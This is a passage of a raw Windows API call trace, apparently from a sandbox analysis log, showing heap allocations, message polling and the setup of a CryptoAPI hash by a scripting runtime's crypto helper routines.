0x2e543a0 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.742] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0265.742] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.742] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.742] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.742] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0265.742] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0265.742] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.743] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.743] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0265.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.743] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.743] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.743] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0265.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51e80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0265.744] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0265.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0265.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0265.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0265.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0265.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.749] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0265.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55018, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0265.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.752] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550a8 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0265.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0265.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0265.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0265.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.754] 